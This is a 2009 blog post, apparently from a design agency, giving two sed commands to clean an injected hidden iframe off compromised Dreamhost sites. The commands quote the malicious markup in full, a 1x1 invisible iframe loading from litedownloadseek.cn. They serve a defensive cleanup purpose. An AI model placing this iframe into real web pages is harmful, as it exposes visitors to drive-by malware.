Quick fix for code inject attack on Dreamhost Servers!

Today evening some of the Dreamhost servers (also one of our client’s) where attacked by some unknown hackers. One line of code where injected to index.php, index.html etc, which will takedown the site.

Here is a quick fix for it. Run these two commands in bash shell of your Dreamhost server. They will remove the injected code from the files.

sed -i 's/<html><body><iframe src=\"http:\/\/litedownloadseek.cn\/in.cgi?cocacola7\" width=1 height=1 style=\"visibility: hidden\"><\/iframe><\/body><\/html>//g' `grep "litedownloadseek" * -r -l`
sed -i 's/<iframe src=\"http:\/\/litedownloadseek.cn\/in.cgi?cocacola7\" width=1 height=1 style=\"visibility: hidden\"><\/iframe>//g' `grep "litedownloadseek" * -r -l`

Disclaimer: Use at your own risk! But this worked for us!

NetBramha wishes you all a rocking 2009!

• Tags

  bangalore barcamp Brand design diwali dreamhost fix fun germany greetings logo logo design new year security startup visit theme Tips web development What We Use wordpress

• Twitter updates

  • Be an UX designer - here is how http://bit.ly/jgZ4z 2009/07/03
  • excited about today :) 2009/07/03

Recently Written

• The German Connection!
• Quick fix for code inject attack on Dreamhost Servers!
• NetBramha wishes you all a rocking 2009!
• 5 Platforms a newbee (or pro) Designer should use to develop sites!
• 8 & 1/2 Free Appz I can’t Live Without

Monthly Archives

• April 2009
• January 2009
• November 2008
• October 2008
• September 2008

Sites We Love

• Devlisting
• hellocrazy.com
• IDEO
• Pattern Tap
• Smashing Magazine
• Typophile

Find It